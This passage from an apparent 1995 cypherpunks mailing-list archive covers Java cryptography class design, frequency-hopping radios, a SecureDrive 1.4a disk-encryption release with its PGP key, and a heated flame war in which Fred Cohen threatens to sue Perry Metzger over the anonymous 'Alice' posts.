used. > > For sci.crypt, I've tried to capture the essence of what cryptographic > functions can do in the base classes, without being specific to any > particular protocol. I'm not completely happy with it, and would welcome > any comments people might have on what might be missing. It's as minimal > as I could make it and still provide a basis for whatever protocols need > to be implemented. > > My motivation here is that Sun and Netscape are talking about defining > a standard way of incorporating cryptographic functions in Java; it would > be nice if the specification were usable for a lot more than the security > protocols that come with Netscape. (I wouldn't object to having access > to SSL from Java---in fact, I'd really like it---but I'd also like access > to MD5 and the like.) > > This implementation of the secure login protocol uses short text strings > to identify the packets being exchanged; that's for convenience while > debugging---in a production implementation, it would be done differently. > Other than that, I'd appreciate any suggestions as to how to improve the > implementation. (A MAC digest prefixed to the packets is something I'm > considering, for example.) > > For comp.lang.java, the splash screen is loaded over the secure connection > but attempts to instantiate a member of the class cause a NoSuchMethodError > to be thrown. The class itself seems to be defined correctly, and it should > be no different from how an applet would be loaded and instantiated, but it > still fails. If anyone can tell me what is going wrong and what I can to > to fix it, the pizza and beer will be on me. (This has been a showstopper > for four days now and I'm getting very frustrated by it.) > > The class design tries to minimize the number of classes that must be > present in the bootstrap set; this led to a somewhat, ah, baroque set of > functionality. If anyone has suggestions on how this could be done better, > I'd be pleased to hear about it. > > If anyone has any questions about this, don't hesitate to drop me a line > or post something in one of the newsgroups. I'm going home for some sleep > now, but I'll be banging my head against it again in the morning. > > -- > -- Greg Noel, UNIX Guru greg at qualcomm.com or greg at noel.cts.com From perry at piermont.com Sat Dec 23 08:50:42 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 24 Dec 1995 00:50:42 +0800 Subject: CFS and Linux In-Reply-To: <199512230317.TAA19444@jobe.shell.portal.com> Message-ID: <199512231615.LAA06929@jekyll.piermont.com> Alice B. Cohen writes: anonymous-remailer at shell.portal.com writes: > > 1: please make it install 'out-of-the-box' on Linux. > > AT&T's refusal to support CFS and other so-called "secure" software > under Linux is typical and to be expected. God, you are an obnoxious prick. First of all, this is Matt Blaze's pet project, not a product of AT&T. It is given away for free and you should be happy to get it at all -- no one is obligated to give you a gift. Have you mailed him a Linux machine to do his testing on? Why do you assume he even has one? As it happens, he doesn't, and probably doesn't want to go through the hassle of paying for a computer and putting Linux on it. Be happy he's given you anything at all. Perry From stevenw at best.com Sat Dec 23 09:03:31 1995 From: stevenw at best.com (Steven Weller) Date: Sun, 24 Dec 1995 01:03:31 +0800 Subject: Message-ID: >On Fri, 22 Dec 1995 andr0id at midwest.net (Jason Rentz) wrote: >> >>The problem with the Interceptor is that I think it can only receive one >>freqency at a time, and it is adjustable by a thumb wheel, not digitally. >>This would tend to make changing frequencies at high rates VERY hard. :) >>Also it has no frequancy readout, so this means that if you know what freq. >>you should be at it is hard to tune in that freq. without searching a >>little. >> Dr0id > >The demo of the Interceptor I saw seemed to show it jumping from 150 MHz >to 450 >MHz without any external adjustments, it locked on the strongest signal. >Granted, it can only receive one frequency at a time, but there shouldn't >be any >significant delays when the phone hops a frequency. The Interceptor's >frequency readout is a bargraph style LED. The Scout, from what I can >see in Optoelectronics' ad doesn't have any frequency controls on it, it does >have a digital frequency readout. As far as timing is concerned, the Scout >might be less useful because I think it feeds the frequency into the >scanner for >reception. Most scanners take a significant amount of time to change >frequencies. I used to work for a company that made frequency-hopping military radios. It's a catch-me-if-you-can game, a bit like the amusement arcade toy where stuffed rats pop up through holes and you try to whack them with rubber hammers. You can sure *see* where the next one is, but you can't get there fast enough to make contact. If you knew the pseudo-random pattern, you could anticipate and be there every time. Thus in a frequency-hopping radio you can push the retuning (read RF phase-locked loop) technology to its limit and build transmitters and receivers around them. These typically hop in the order of 100 times a second. The adversary has to find the uncorrelated signal very quickly indeed *and* have PLL technology at least as good as yours to recover anything from it. Finding the signal generally means listening to all frequencies at once, requiring huge amounts of hardware parallelism and/or realtime computing power. Once you throw ten or so radios onto the same band, it's no longer any use looking for the strongest signal, making that approach useless. The primary reason for FH is not to hide information, however. Encryption can be used for that. It's to prevent the enemy from hiding the information from the intended recipient through jamming. Radio jammers work by simply drowning out all other traffic so that the receivers either clip and distort everything or have to attentuate the input signal so far that the interesting stuff is undetectable. Like trying to have an intellectual conversation at a bad rock concert. By employing FH you require the enemy to have enormous and impractical jamming capacity. There are FH radars too. ------------------------------------------------------------------------- Steven Weller | "The Internet, of course, is more | than just a place to find pictures | of people having sex with dogs." stevenw at best.com | -- Time Magazine, 3 July 1995 From ravage at einstein.ssz.com Sat Dec 23 09:03:40 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Sun, 24 Dec 1995 01:03:40 +0800 Subject: CFS and Linux (fwd) Message-ID: <199512231633.KAA04297@einstein> Forwarded message: > Subject: Re: CFS and Linux > Date: Sat, 23 Dec 1995 11:15:40 -0500 > From: "Perry E. Metzger" > > Alice B. Cohen writes: > anonymous-remailer at shell.portal.com writes: > > > 1: please make it install 'out-of-the-box' on Linux. > > > > AT&T's refusal to support CFS and other so-called "secure" software > > under Linux is typical and to be expected. > > God, you are an obnoxious prick. > Ditto. > First of all, this is Matt Blaze's pet project, not a product of > AT&T. It is given away for free and you should be happy to get it at > all -- no one is obligated to give you a gift. Have you mailed him a > Linux machine to do his testing on? Why do you assume he even has one? > As it happens, he doesn't, and probably doesn't want to go through the > hassle of paying for a computer and putting Linux on it. > > Be happy he's given you anything at all. > > Perry > If you are going to do it, do it right the first time. Second, I really doubt Blaze has a problem obtaining access to computing power and a $25 CD should be within his budget. Merry Christmas. From perry at piermont.com Sat Dec 23 09:14:26 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 24 Dec 1995 01:14:26 +0800 Subject: CFS and Linux (fwd) In-Reply-To: <199512231633.KAA04297@einstein> Message-ID: <199512231640.LAA07020@jekyll.piermont.com> Jim Choate writes: > > > First of all, this is Matt Blaze's pet project, not a product of > > AT&T. It is given away for free and you should be happy to get it at > > all -- no one is obligated to give you a gift. Have you mailed him a > > Linux machine to do his testing on? Why do you assume he even has one? > > As it happens, he doesn't, and probably doesn't want to go through the > > hassle of paying for a computer and putting Linux on it. > > > > Be happy he's given you anything at all. > > If you are going to do it, do it right the first time. > > Second, I really doubt Blaze has a problem obtaining access to computing > power and a $25 CD should be within his budget. Setting up and doing work on a new operating system is *WORK*. It takes time. It takes space in your lab or office. Maybe he just doesn't feel like spending that time, effort, and lab budget. Why should he? CFS is a GIFT. It isn't a product. Maybe if you paid someone to maintain a Linux version you would have one, but you aren't paying a penny. Quit looking a gift horse in the mouth. .pm From perry at piermont.com Sat Dec 23 09:48:31 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 24 Dec 1995 01:48:31 +0800 Subject: CFS and Linux In-Reply-To: <9512231705.AA21041@all.net> Message-ID: <199512231733.MAA07103@jekyll.piermont.com> Fred Cohen writes to me in private: > > Alice B. Cohen writes: > > If you mean to imply that I am Alice, that constitutes slander, and I > will sue. I'd love to see you try. Please, sue me immediately. Since you agree in public with Alice practically all the time, the damages would be fascinating to assess. "Your honor, my client, who has no reputation in the group we are discussing to speak of, feels that by being publically conflated with this anonymous personage who's opinions he univerasally agrees with that his reputation has been damaged, since, well, er, we aren't sure why, but it has. I mean, people might ascribe opinions to him that he claims to hold! Obviously that must be damaging!" What would the monetary damages be, Fred? I mean, there are some people here who would gain a bit of added respect for you since being Alice would imply that you knew how to use anonymous remailers, so there would be some evidence that you could do *something*, which many people here had in doubt up until now. I suspect you actually gain reputation that way, so perhaps I should sue you for unjust enrichment. (*) Perry (* Not close captioned for the sarcasm impaired.) From edgar at Garg.Campbell.CA.US Sat Dec 23 10:34:05 1995 From: edgar at Garg.Campbell.CA.US (Edgar Swank) Date: Sun, 24 Dec 1995 02:34:05 +0800 Subject: Announcing SecureDrive 1.4a Message-ID: -----BEGIN PGP SIGNED MESSAGE----- This is to announce the availability of Version 1.4a of SecureDrive. SecureDrive Version 1.4a replaces version 1.4, 1.3d, and previous versions. Release 1.4a is a maintenance release of 1.4. No new function is added. Only module SDCOMMON.C has a non-cosmetic change, which affects executables LOGIN.EXE and CRYPTDSK.EXE. For that reason, all other executables still self-identify as release 1.4. They are in fact the exact same EXE & COM files as release 1.4. 1.4a fixes a problem decrypting or activating a diskette or disk partition encrypted with both a passphrase and a keyfile. There are also some minor changes in SECDRV.DOC. In the USA, SecureDrive 1.4a is not available at Colorado Catacombs BBS - 303-772-1062 (up to 28,800 bps, 8n1) - log in with your own name or alias. Download SECDR14A.ZIP from the [F]ile menu. see ftp://ftp.csn.net/mpj/README for the ??????? in ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/secdr14a.zip See ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS for access to ftp://miyako.dorm.duke.edu/mpj/crypto/link/mpj/disk/secdr14a.zip These are all controlled-access sites available to USA citizens and residents only. Thanks to the cooperation of Steve Crompton of the U.K., who worked with me closely, I am able to also announce availability on an offshore site, ftp://utopia.hacktic.nl/pub/replay/pub/incoming/SECDR14A.ZIP If you perchance don't find it there try directories /pub/replay/pub/crypto/CRYPTOapps /pub/replay/pub/disk which currently contains previous versions of SecureDrive. But as I write, SECDR14A.ZIP has been left in the incoming directory for several days. Steve also uploaded 1.4a to ftp.ox.ac.uk/incoming But it has been removed from there and has (so far) not reappeared elsewhere. But previous versions are in directory pub/crypto/misc so it might be worth checking there from time to time. In case anyone in the U.S. Justice Dept. is reading this, Steve and I were very careful to do this release without violating US export restrictions. The only things I "exported" to Steve were "diffs" for source changes from 1.4 to 1.4a, which themselves don't contain any code capable of encryption or decryption. Steve combined those with source for 1.4, which "leaked" from the US sites where I released it months ago. Steve compiled the new source code, and sent the new EXE files to me. I compared the new executables to ones I compiled myself and verified they match, bit for bit. I then sent back to Steve detached signature files for the executables. Steve then put together SECDR14A.ZIP and sent that to me for final inspection. I then compared all files against my "master" files here and verified that they matched. I then shipped the SECDR14A.ZIP that Steve sent me to the USA sites. So the USA release matches bit for bit the offshore release. Here are the contents of SECDR14A.ZIP Length Method Size Ratio Date Time CRC-32 Attr Name ------ ------ ----- ----- ---- ---- -------- ---- ---- 18321 DeflatN 6923 63% 06-14-93 22:27 0767480b --w- COPYING 2022 DeflatN 789 61% 08-06-95 00:00 dd3e9e64 --w- COPYSECT.C 12542 DeflatN 7674 39% 08-06-95 00:00 c089888f --w- COPYSECT.EXE 152 Stored 152 0% 08-06-95 00:00 17b02bc2 --w- COPYSECT.SIG 19664 DeflatN 4241 79% 11-19-93 21:42 22c2502c --w- CRYPT2.ASM 19625 DeflatN 4618 77% 11-10-95 16:11 3a6b64fe --w- CRYPTDSK.C 41898 DeflatN 19879 53% 11-14-95 18:59 26bc0200 --w- CRYPTDSK.EXE 4353 DeflatN 1723 61% 08-06-95 00:00 b4e99e6a --w- FPART.C 15450 DeflatN 9794 37% 08-06-95 00:00 44c4a0e7 --w- FPART.EXE 152 Stored 152 0% 08-06-95 00:00 0b345a16 --w- FPART.SIG 5278 DeflatN 3468 35% 11-14-95 20:52 af2f141c --w- KEY.ASC 18450 DeflatN 4541 76% 11-10-95 16:13 c5ad8fa4 --w- LOGIN.C 43558 DeflatN 20297 54% 11-14-95 18:59 cfd0bd3b --w- LOGIN.EXE 278 DeflatN 250 11% 12-06-95 20:33 6c13428c --w- FILE_ID.DIZ 1554 DeflatN 568 64% 08-06-95 00:00 3589f489 --w- MAKEFILE 11557 DeflatN 3315 72% 05-09-93 19:38 e71f3eea --w- MD5.C 3407 DeflatN 1104 68% 05-11-93 12:49 f1f58517 --w- MD5.H 1355 DeflatN 629 54% 01-21-94 08:44 db63ade4 --w- RLDBIOS.ASM 14819 DeflatN 4087 73% 11-14-95 18:56 592274c6 --w- SDCOMMON.C 52551 DeflatN 19113 64% 12-06-95 15:33 cf5e3ded --w- SECDRV.DOC 3656 DeflatN 1098 70% 08-06-95 00:00 6ed75bcc --w- SECDRV.H 32595 DeflatN 8906 73% 08-06-95 00:00 1c7d2225 --w- SECTSR.ASM 2000 DeflatN 1326 34% 08-06-95 00:00 ba1568d1 --w- SECTSR.COM 152 Stored 152 0% 08-06-95 00:00 3817512c --w- SECTSR.SIG 11519 DeflatN 2864 76% 08-06-95 00:00 060d33e8 --w- SETENV.ASM 1254 DeflatN 541 57% 05-09-93 19:39 182978aa --w- USUALS.H 152 Stored 152 0% 12-06-95 17:05 2d1c5fc9 --w- CRYPTDSK.SIG 152 Stored 152 0% 12-06-95 17:10 8dae8ad5 --w- LOGIN.SIG ------ ------ --- ------- 338466 128508 63% 28 Also note that the ZIP file contains PGP detached signatures (*.SIG) for the executable files. Finally here is my public key, also available on many public keyservers; note who has signed it. Also please note my present Email address. Edgar Swank (Only Garg ID is now valid) Type bits/keyID Date User ID pub 1024/DA87C0C7 1992/10/17 Edgar Swank sig 32DD98D9 Vesselin V. Bontchev sig 0F59323D Albert Yee sig DA87C0C7 Edgar Swank Edgar W. Swank sig 91E71221 Cruz sig DA87C0C7 Edgar Swank sig C0595F91 Ian H. Chan sig 61130A1B Arnold L. Cornez, J.D. sig 18239E91 Robert C.Casas <73763.20 at compuserve.com> sig 4AAF00E5 Dave Del Torto sig 08B707C5 Anton Sherwood sig 32DD98D9 Vesselin V. Bontchev sig 34D74DC1 Peter Simons Edgar W. Swank sig 08B707C5 Anton Sherwood sig 32DD98D9 Vesselin V. Bontchev sig FF67F70B Philip R. Zimmermann - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 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 7n/03ld56wWGttc2sw== =n5hN - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNszct4nNf3ah8DHAQHBGQQAhbb0ZCJ3iiB096HxJac33XFTxG/GwNB4 4nWN5/I2s8Cve/USUGVC9YIHKV7NHkHn0Pybo727w46am6DMLoQTdnPzR2O+C+TY mozxnwDYfznzWCzjqadHOsPRK9/ix8aB2ThfGsNaAvOgVjvnDg/uG8ztLwW/G1Hv L/zVBh8nIs0= =YArx -----END PGP SIGNATURE----- -- edgar at Garg.Campbell.CA.US (Edgar Swank) The Land of Garg BBS -- +1 408 378-5108 From anonymous-remailer at shell.portal.com Sat Dec 23 11:09:06 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sun, 24 Dec 1995 03:09:06 +0800 Subject: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE?? Message-ID: <199512231817.KAA24182@jobe.shell.portal.com> On Fri, 22 Dec 1995, Perry E. Metzger wrote: > anonymous-remailer at shell.portal.com writes: > > Everyone should ask this question. AT&T can sign-on to a two-page ad, > > calling on Congress to balance the budget -- to cut off veterans, and > > cut-off women with dependent children just before Christmas. It can > > sign on to this, but it can't bother to even offer a scholarship to > > the students who helped make its fortunes. It would rather leave the > > impression that it freeloads off of other's efforts. > > God, you are annoying Fred, ER, I meant, "Alice". My dearest Perry. I am not Fred. I am not he. He is not me. Got it?? We aren't even in the same category or the same country. Fred's an American, and I am not. Scary, isn't it?? A non-American ... Oh ... and a Happy Ho Ho to ya, Perry. My own best wishes. (just in case you didn't get my email, which wished the same, I mean). And _none_ of this changes the fact that AT&T and Netscape are my personal nominees for the "Christmas Net Scrooge" award. Anyone willing to second, that?? Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From perry at piermont.com Sat Dec 23 11:13:10 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 24 Dec 1995 03:13:10 +0800 Subject: CFS and Linux In-Reply-To: <9512231757.AA22460@all.net> Message-ID: <199512231833.NAA07171@jekyll.piermont.com> Fred Cohen writes: > The dollar value would be $1 plus a public apology plus all costs of the > suit plus my time to right the wrong (at my usual fee of course). Of > course the fact that you have decided to make this posting in public > justifies my extensive efforts to clear my reputation which, unless you > apologize immediately will be surprisingly enjoyable for me. Go and sue, Fred. Its what I have lawyers for. If you can even find an attorney willing to take your "case", mine will likely remind yours that lawyers can now be punished by the court in many jurisdictions for knowingly aiding in bringing frivolous suits. If you are seeking $1 in damages the court is especially likely to consider the whole thing a waste of time. I think you will find that I'm very, very hard to intimidate. Don't bother "giving me a second chance" or any such stuff. Either find a lawyer stupid enough to risk his license by taking this case and let me know you are suing me by sending over a process server, or quit bothering me. > Let's see. I guess I would start by having the police confiscate the > toad.com computers becfause thay are part of a criminal conspiracy to > daamage my reputation. Criminal because of the recent changes in the > law that prohibit you from sending me information I don't want to get. I think you will find that John Gilmore is even more difficult to intimidate than I am. Perry From perry at piermont.com Sat Dec 23 11:14:20 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 24 Dec 1995 03:14:20 +0800 Subject: Fred Cohen: Re: CFS and Linux Message-ID: <199512231823.NAA07160@jekyll.piermont.com> I thought people would love to see this. Note especially "Dr." Fred's threat to have toad.com confiscated as part of a conspiracy against his reputation. Perry ------- Forwarded Message From: fc at all.net (Fred Cohen) Message-Id: <9512231757.AA22460 at all.net> Subject: Re: CFS and Linux To: perry at piermont.com Date: Sat, 23 Dec 1995 12:57:40 -0500 (EST) In-Reply-To: <199512231733.MAA07103 at jekyll.piermont.com> from "Perry E. Metzger" at Dec 23, 95 12:33:15 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text X-UIDL: 819742624.003 > Fred Cohen writes to me in private: > > > Alice B. Cohen writes: > > > > If you mean to imply that I am Alice, that constitutes slander, and I > > will sue. > > I'd love to see you try. Please, sue me immediately. > > Since you agree in public with Alice practically all the time, the > damages would be fascinating to assess. "Your honor, my client, who > has no reputation in the group we are discussing to speak of, feels > that by being publically conflated with this anonymous personage who's > opinions he univerasally agrees with that his reputation has been > damaged, since, well, er, we aren't sure why, but it has. I mean, > people might ascribe opinions to him that he claims to hold! Obviously > that must be damaging!" To the contrary, I have a very good global reputation, and you are knowingly and maliciously attempting to slander me by claiming that I use a false identity to support my positions. > What would the monetary damages be, Fred? I mean, there are some > people here who would gain a bit of added respect for you since being > Alice would imply that you knew how to use anonymous remailers, so > there would be some evidence that you could do *something*, which many > people here had in doubt up until now. I suspect you actually gain > reputation that way, so perhaps I should sue you for unjust > enrichment. (*) Let's see. I guess I would start by having the police confiscate the toad.com computers becfause thay are part of a criminal conspiracy to daamage my reputation. Criminal because of the recent changes in the law that prohibit you from sending me information I don't want to get. The dollar value would be $1 plus a public apology plus all costs of the suit plus my time to right the wrong (at my usual fee of course). Of course the fact that you have decided to make this posting in public justifies my extensive efforts to clear my reputation which, unless you apologize immediately will be surprisingly enjoyable for me. - -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 ------- End of Forwarded Message From perry at piermont.com Sat Dec 23 11:32:38 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 24 Dec 1995 03:32:38 +0800 Subject: Fred Cohen: Re: CFS and Linux Message-ID: <199512231845.NAA07203@jekyll.piermont.com> More Fun from Fred. For those that haven't been following, he threatened to sue me for quoting an Alice post as "Alice B. Cohen", and threatened to have his attorneys seize the machines the cypherpunks mailing lists run on for being part of a "criminal conspiracy" against him. Perry ------- Forwarded Message From: fc at all.net (Fred Cohen) Message-Id: <9512231834.AA23326 at all.net> Subject: Re: CFS and Linux To: perry at piermont.com Date: Sat, 23 Dec 1995 13:34:49 -0500 (EST) In-Reply-To: <199512231833.NAA07171 at jekyll.piermont.com> from "Perry E. Metzger" at Dec 23, 95 01:33:45 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text X-UIDL: 819744158.001 > Fred Cohen writes: > > The dollar value would be $1 plus a public apology plus all costs of the > > suit plus my time to right the wrong (at my usual fee of course). Of > > course the fact that you have decided to make this posting in public > > justifies my extensive efforts to clear my reputation which, unless you > > apologize immediately will be surprisingly enjoyable for me. > > Go and sue, Fred. Its what I have lawyers for. If you can even find an > attorney willing to take your "case", mine will likely remind yours > that lawyers can now be punished by the court in many jurisdictions > for knowingly aiding in bringing frivolous suits. If you are seeking > $1 in damages the court is especially likely to consider the whole > thing a waste of time. Your choice, but it's not a very nice Christmas present to find yourself in litigation. I'll give you till Tuesday to reconsider. If I see the public apology, I won't call the lawyers. If I were you, I would talk to those lawyers of yours and get their opinion of whether it's worth your while to be malicious toward people in this way in exchange for defending against a law suit when all you have to do to prevent it is apologize for what you now know to be a falsehood. - -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 ------- End of Forwarded Message From perry at piermont.com Sat Dec 23 11:40:36 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 24 Dec 1995 03:40:36 +0800 Subject: CFS and Linux In-Reply-To: <9512231834.AA23326@all.net> Message-ID: <199512231855.NAA07214@jekyll.piermont.com> Fred Cohen writes: > > Go and sue, Fred. Its what I have lawyers for. If you can even find an > > attorney willing to take your "case", mine will likely remind yours > > that lawyers can now be punished by the court in many jurisdictions > > for knowingly aiding in bringing frivolous suits. If you are seeking > > $1 in damages the court is especially likely to consider the whole > > thing a waste of time. > > Your choice, but it's not a very nice Christmas present to find yourself > in litigation. I'll give you till Tuesday to reconsider. If I see the > public apology, I won't call the lawyers. As I said, Fred, quit giving me "second chances"; either send the process server with the court papers or let the matter drop. Don't bother sending any more "just one more chance" messages to me -- I won't be altering my opinion. As for apologies, I have nothing to apologize for, so I have no intention of apologizing to you -- ever. Perry From ericm at lne.com Sat Dec 23 11:47:48 1995 From: ericm at lne.com (Eric Murray) Date: Sun, 24 Dec 1995 03:47:48 +0800 Subject: Fred Cohen: Re: CFS and Linux In-Reply-To: <199512231823.NAA07160@jekyll.piermont.com> Message-ID: <199512231904.LAA00483@slack.lne.com> > I thought people would love to see this. > > Note especially "Dr." Fred's threat to have toad.com confiscated as > part of a conspiracy against his reputation. I'm sure a number of people, myself included, would be willing to host the CP list should "Dr" Fred make good his threat. I'd even be willing to testify in court as to the nature of Fred's reputation. I'm sure the operator of the Firewalls list would be too. -- Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF From frenchie at magus.dgsys.com Sat Dec 23 12:12:32 1995 From: frenchie at magus.dgsys.com (J.Francois) Date: Sun, 24 Dec 1995 04:12:32 +0800 Subject: Fred Cohen In-Reply-To: <199512231845.NAA07203@jekyll.piermont.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- While browsing my mail I noticed that Perry E. Metzger wrote: > More Fun from Fred. For those that haven't been following, he > threatened to sue me for quoting an Alice post as "Alice B. Cohen", > and threatened to have his attorneys seize the machines the > cypherpunks mailing lists run on for being part of a "criminal > conspiracy" against him. > > Perry Maybe the Jargon File offers some insight: :Mbogo, Dr. Fred: /*m-boh'goh, dok'tr fred/ [Stanford] n. The archetypal man you don't want to see about a problem, esp. an incompetent professional; a shyster. "Do you know a good eye doctor?" "Sure, try Mbogo Eye Care and Professional Dry Cleaning." The name comes from synergy between {bogus} and the original Dr. Mbogo, a witch doctor who was Gomez Addams' 